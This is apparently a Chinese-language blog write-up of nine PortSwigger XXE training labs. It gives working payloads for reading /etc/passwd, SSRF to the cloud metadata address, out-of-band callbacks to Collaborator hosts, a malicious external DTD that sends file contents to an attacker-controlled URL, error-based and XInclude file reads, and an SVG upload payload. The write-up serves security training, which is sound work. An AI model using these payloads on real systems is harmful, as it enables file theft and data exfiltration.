首页 > 其他分享 >Portswigger 靶场之 XML 外部实体注入(XEE)

Portswigger 靶场之 XML 外部实体注入(XEE)

时间:2023-02-22 18:02:20浏览次数:56  
标签:XML XEE xxe 文件 实体 Portswigger XXE 攻击者

All labs | Web Security Academy (portswigger.net)

1. Exploiting XXE using external entities to retrieve files

使用外部实体利用 XXE 来检索文件

检查库存功能用 burp 截断数据包,然后松手在 HTTP History 中查看请求,转到 Repeater。

往下看,当看到 XML 的时候,应该考虑 XXE 注入。接下来就是找到注入点,具体位置有两个,一个是 productId,另一个是 storeId。

在 XML 声明和元素 stockCheck 之间插入外部实体定义。

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

# 定义了一个名为 xxe 的实体,它指向文件系统中的 /etc/passwd 文件。

2. Exploiting XXE to perform SSRF attacks

利用 XXE 执行 SSRF 攻击

依旧是抓包检查库存功能,会发现有一个包含 XML 的帖子请求。

声明一个外部实体,不再引用本地文件而是查看是否可以发送到 IP 地址169.254.169.254

Send 发送请求,从响应中得到目录,连续往下遍历目录,最后获得敏感信息。

3. Blind XXE with out-of-band interaction

带外交互的盲 XXE

访问产品页面,单击“检查库存”并在 Burp 中拦截请求。

定义外部实体,插入 Burp 的协作子域名。转到“子域名”选项卡,然后单击“Poll now”。 可以看到 DNS 和 HTTP 交互。它的作用是,确认我们可以让应用程序与攻击者控制的对话服务器,为带外渗透做好准备

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://1hj71n3ymgjdmmtrt6ye3mqcf3lt9i.oastify.com"> ]>

4. Blind XXE with out-of-band interaction via XML parameter entities

通过 XML 参数实体进行带外交互的盲 XXE

外带交互的盲 XXE 是通过利用 XML 解析器向外部服务器(burp 子域)发送数据,使得攻击者可以通过外部服务器与目标系统进行交互

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://1hj71n3ymgjdmmtrt6ye3mqcf3lt9i.oastify.com"> %xxe; ]>

# 定义了一个名为 xxe 的参数实体,它指向一个远程 URL http://……
# 使用了 % 操作符来引用实体,%xxe --> 表示引用实体xxe
# XML 文档被解析时,实体引用(%xxe; )将会被展开并替换为实体声明中的值(也就是远程 URL),而可能导致系统被攻击者控制的服务器接管。

Quote / 参考

盲XXE(Blind XXE),它可以在没有直接访问应用程序响应的情况下,仍能从应用程序中获取敏感信息。

5. Exploiting blind XXE to exfiltrate data using a malicious external DTD

利用盲 XXE 使用恶意外部 DTD 泄露数据

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://0abk7wm21os9liaqg27kek4ic9iz6o.oastify.com/?x=%file;'>">
%eval;
%exfil;

# 定义了一个名为 file 的外部实体,它包含了 /etc/hostname 文件的内容。可以利用此实体来访问并泄露目标系统中的文件内容

# 这一行定义了一个名为 eval 的外部实体,它包含了一个实体声明 exfil,该实体可将 file 实体的内容发送到攻击者控制的服务器。exfil实体的定义包括一个URL,该URL包含攻击者控制的服务器地址和将file实体的内容作为查询参数的字符串。在这种情况下,exfil实体将文件内容发送到http://0abk7wm21os9liaqg27kek4ic9iz6o.oastify.com/,并将file实体的内容作为查询参数x的值。

# %eval; %exfil; 这两行将eval实体和exfil实体插入到XML文档中。攻击者可以将这些实体插入到一个合法的XML文档中,并发送给目标系统进行解析。在解析XML文档时,目标系统将解析eval实体,然后解析exfil实体,从而触发将file实体的内容发送到攻击者控制的服务器的行为。

将 DTD 文件保存在服务器上,单击“查看漏洞”并记下 URL;用 burp 截断检查库存的请求,定义外部实体

最后返回 Burp Collaborator client,会看到一些 DNS 和 HTTP 交互,特别关注 HTTP 交互,可能包含文件的内容。/etc/hostname

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a57006c0302b2d5c0e221d8013c0082.exploit-server.net/exploit"> %xxe;]>

6. Exploiting blind XXE to retrieve data via error messages

利用盲 XXE 通过错误消息检索数据

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

将 DTD 文件保存在服务器上,单击“查看漏洞”并记下 URL;用 burp 截断检查库存的请求,定义外部实体,会看到一条包含文件内容错误消息

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a42007304c1c092c003856801a900e4.exploit-server.net/exploit"> %xxe;]>

# 定义了一个名为 foo 的 DTD 声明,其中包含了一个名为 xxe的 外部实体。
# xxe 实体的定义包括一个 URL,该 URL 指向服务器上的一个文件,文件包含敏感信息。在这种情况下,可以将获取的信息发送到 https……

7. Exploiting XInclude to retrieve files

利用 XInclude 检索文件

抓包检查库存功能,修改 productId 的值

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

# 这个XML文档定义了一个名为foo的元素,并且通过XML命名空间定义了一个名为xi的前缀,它的命名空间是"http://www.w3.org/2001/XInclude"。然后,它使用了`xi:include`元素来指定要包含的内容,包括`parse`和`href`属性。

# parse属性指定了包含的文件是以文本方式解析的,而不是XML方式解析。href属性指定了要包含的文件的路径,这里是file:///etc/passwd,也就是本地系统上的/etc/passwd文件。由于该文件包含有关用户帐户的信息,因此攻击者可以使用这种技术来收集系统信息并进行其他攻击。

8. Exploiting XXE via image file upload

通过图像文件上传利用XXE

下载一个SVG 文件(注意不要太大),上传 SVG 文件,发表评论的时候抓包,修改 SVG 文件的内容

Expand / 拓展

SVG 文件是由 XML 构成的,因此可以使用 XML 的各种功能来嵌入数据或 payload 到 SVG 图像中。由于 SVG 图像可以包含文本、图形和脚本等元素,因此可以使用这些元素来嵌入payload

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

# 当SVG文件被处理时,xxe实体会被解析为文件/etc/hostname的内容,然后将该内容作为文本元素的内容插入到SVG图像中,从而显示该文件的内容。

9. Exploiting XXE to retrieve data by repurposing a local DTD

利用 XXE 通过重新调整本地 DTD 的用途来检索数据

抓包检查库存功能

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

# 定义名为“file”的实体,并将其设置为/etc/passwd文件的路径,然后通过将这个实体插入到另一个名为“eval”的实体中,最终触发了漏洞,导致可以读取系统上的/etc/passwd文件的内容。同时,攻击者也定义了一个名为“error”的实体,用于报告错误信息。

标签:XML,XEE,xxe,文件,实体,Portswigger,XXE,攻击者
From: https://www.cnblogs.com/yii-ling/p/17145334.html

相关文章

  • C# 解析xml串节点值
    例如xml串:<?xmlversion="1.0"encoding="UTF-16"standalone="yes"?><rootversion="1.00.0965"><statesuccess="true"></state><detailreprintflag>0</detailreprintf......
  • Mybatis中xml文件书写sql注意项
      1、namespace的值要与mapper接口绑定。2、select标签中的id要与mapper接口中的方法名绑定。3、模糊查询时注意%的位置;且不用像SQL里一样加双引号;SQL末尾不要加分......
  • 十四、XML
    一XML用以存储数据,做数据交互的。1.申明/抬头必须在第一行2.标签(元素),注意一个XML文件只能有一个根标签3.实体字符:在xml文件中,我们不能直接写小于号,等一些特殊字符......
  • JAVA实现XML格式数据转JsonObject
     xml:<dependency><groupId>dom4j</groupId><artifactId>dom4j</artifactId><version>1.6.1</version></dependenc......
  • C#操作XML文件
    加载staticstringstrPath="Employee.xml";staticstringstrID="";//窗体加载时加载XML文件privatevoidForm1_Load(objectsend......
  • Filter_细节_web.xml配置方式与Filter_细节_执行流程&生命周期
    Filter_细节_web.xml配置方式过滤细节:  1.web.xml配置<?xmlversion="1.0"encoding="UTF-8"?><web-appxmlns="http://xmlns.j......
  • 812~813 Filter的web.xml配置方式、执行流程&声明周期
    3、过滤器细节:1、web.xml配置<filter><filter-name>test1</filter-name><filter-class>com.example.web.filter.FilterDemo1</fi......
  • 【Spring AOP】【二】Spring AOP源码解析-XML方式加载解析过程
    1 前言这篇我们看一下,我们的AOP代码是怎么被Spring加载的进去的,那么分两种一种是XML配置的,一种就是我们常用的注解,我们从源码先看下XML方式的都是怎么被加载解析的。2......
  • LabVIEW|知识点:XML文件格式
      XML(eXtensibleMarkupLanguage)是一种目前广泛使用的数据传输和存储的格式,其本质上是一种文本文件,可以使用任何一个文本编辑工具打开和修改。类似于HTML,XML被设计为具......
  • Portswigger 靶场之“文件上传”
    FileuploadvulnerabilitiesAlllabs|WebSecurityAcademy(portswigger.net)1.Remotecodeexecutionviawebshellupload通过Webshell上传远程执行代码......